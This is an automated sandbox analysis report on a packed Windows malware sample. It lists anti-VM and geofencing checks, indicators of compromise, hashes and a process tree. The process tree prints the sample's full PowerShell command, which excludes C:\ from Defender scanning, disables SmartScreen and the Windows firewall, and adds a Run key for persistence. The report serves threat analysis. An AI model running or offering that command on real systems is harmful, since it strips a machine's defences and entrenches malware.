Analysis
-
max time kernel
154s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
15-02-2022 13:36
Static task
static1
Behavioral task
behavioral1
Sample
4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe
Resource
win10v2004-en-20220112
General
-
Target
4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe
-
Size
3.4MB
-
MD5
240dc3df45fd2233148581beb6cdb4b1
-
SHA1
6a565becd793e09d7a69ff2a116f821ddc2d79b1
-
SHA256
4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a
-
SHA512
0ff80f8192e3bda22f303b78eef624cd2b48fe0bc611c7acdfa48f4cd06b7bc1fcaa60710e8dcae6ccccd35bc0be3ac3e38d12c6e8e8e2d184b412d9a4e9bc52
Malware Config
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" powershell.exe -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 2052 created 984 2052 WerFault.exe 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
UpSys.exeUpSys.exeUpSys.exepid process 3168 UpSys.exe 1636 UpSys.exe 1092 UpSys.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe -
Processes:
resource yara_rule behavioral2/memory/984-131-0x00007FF708DE0000-0x00007FF70973B000-memory.dmp themida behavioral2/memory/984-132-0x00007FF708DE0000-0x00007FF70973B000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe" powershell.exe -
Processes:
4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exepid process 984 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe -
Drops file in Windows directory 3 IoCs
Processes:
svchost.exeTiWorker.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2196 984 WerFault.exe 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeMusNotifyIcon.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MusNotifyIcon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MusNotifyIcon.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exesvchost.exeUpSys.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4096" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "1.111109" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132895822296636113" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" UpSys.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" svchost.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exeWerFault.exeUpSys.exeUpSys.exepowershell.exepid process 2372 powershell.exe 2372 powershell.exe 2196 WerFault.exe 2196 WerFault.exe 3168 UpSys.exe 3168 UpSys.exe 3168 UpSys.exe 3168 UpSys.exe 1636 UpSys.exe 1636 UpSys.exe 1636 UpSys.exe 1636 UpSys.exe 3132 powershell.exe 3132 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeUpSys.exeUpSys.exepowershell.exeTiWorker.exedescription pid process Token: SeDebugPrivilege 2372 powershell.exe Token: SeDebugPrivilege 3168 UpSys.exe Token: SeAssignPrimaryTokenPrivilege 3168 UpSys.exe Token: SeIncreaseQuotaPrivilege 3168 UpSys.exe Token: 0 3168 UpSys.exe Token: SeBackupPrivilege 2372 powershell.exe Token: SeDebugPrivilege 1636 UpSys.exe Token: SeAssignPrimaryTokenPrivilege 1636 UpSys.exe Token: SeIncreaseQuotaPrivilege 1636 UpSys.exe Token: SeBackupPrivilege 2372 powershell.exe Token: SeRestorePrivilege 2372 powershell.exe Token: SeSecurityPrivilege 2372 powershell.exe Token: SeDebugPrivilege 3132 powershell.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe Token: SeBackupPrivilege 2372 TiWorker.exe Token: SeRestorePrivilege 2372 TiWorker.exe Token: SeSecurityPrivilege 2372 TiWorker.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exeWerFault.exepowershell.exeUpSys.exedescription pid process target process PID 984 wrote to memory of 2372 984 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe powershell.exe PID 984 wrote to memory of 2372 984 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe powershell.exe PID 2052 wrote to memory of 984 2052 WerFault.exe 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe PID 2052 wrote to memory of 984 2052 WerFault.exe 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe PID 2372 wrote to memory of 3168 2372 powershell.exe UpSys.exe PID 2372 wrote to memory of 3168 2372 powershell.exe UpSys.exe PID 2372 wrote to memory of 2072 2372 powershell.exe netsh.exe PID 2372 wrote to memory of 2072 2372 powershell.exe netsh.exe PID 1092 wrote to memory of 3132 1092 UpSys.exe powershell.exe PID 1092 wrote to memory of 3132 1092 UpSys.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe"C:\Users\Admin\AppData\Local\Temp\4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe"1⤵
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)2⤵
- Modifies security service
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 984 -s 20882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\MusNotifyIcon.exe%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 131⤵
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 984 -ip 9841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\UpSys.exeMD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeMD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeMD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeMD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
memory/984-132-0x00007FF708DE0000-0x00007FF70973B000-memory.dmpFilesize
9.4MB
-
memory/984-130-0x00007FFB26450000-0x00007FFB26452000-memory.dmpFilesize
8KB
-
memory/984-131-0x00007FF708DE0000-0x00007FF70973B000-memory.dmpFilesize
9.4MB
-
memory/2372-146-0x000001AF5FB08000-0x000001AF5FB09000-memory.dmpFilesize
4KB
-
memory/2372-138-0x000001AF5FB00000-0x000001AF5FB02000-memory.dmpFilesize
8KB
-
memory/2372-142-0x000001AF5FB03000-0x000001AF5FB05000-memory.dmpFilesize
8KB
-
memory/2372-137-0x00007FFB05963000-0x00007FFB05965000-memory.dmpFilesize
8KB
-
memory/2372-143-0x000001AF5FB06000-0x000001AF5FB08000-memory.dmpFilesize
8KB
-
memory/2372-139-0x000001AF5FCC0000-0x000001AF5FCE2000-memory.dmpFilesize
136KB
-
memory/3132-154-0x00007FFB05F33000-0x00007FFB05F35000-memory.dmpFilesize
8KB
-
memory/3132-155-0x0000017B71000000-0x0000017B71002000-memory.dmpFilesize
8KB
-
memory/3132-156-0x0000017B71003000-0x0000017B71005000-memory.dmpFilesize
8KB
-
memory/3132-159-0x0000017B71006000-0x0000017B71008000-memory.dmpFilesize
8KB
-
memory/3132-160-0x0000017B712A0000-0x0000017B712E4000-memory.dmpFilesize
272KB
-
memory/3132-161-0x0000017B71590000-0x0000017B71606000-memory.dmpFilesize
472KB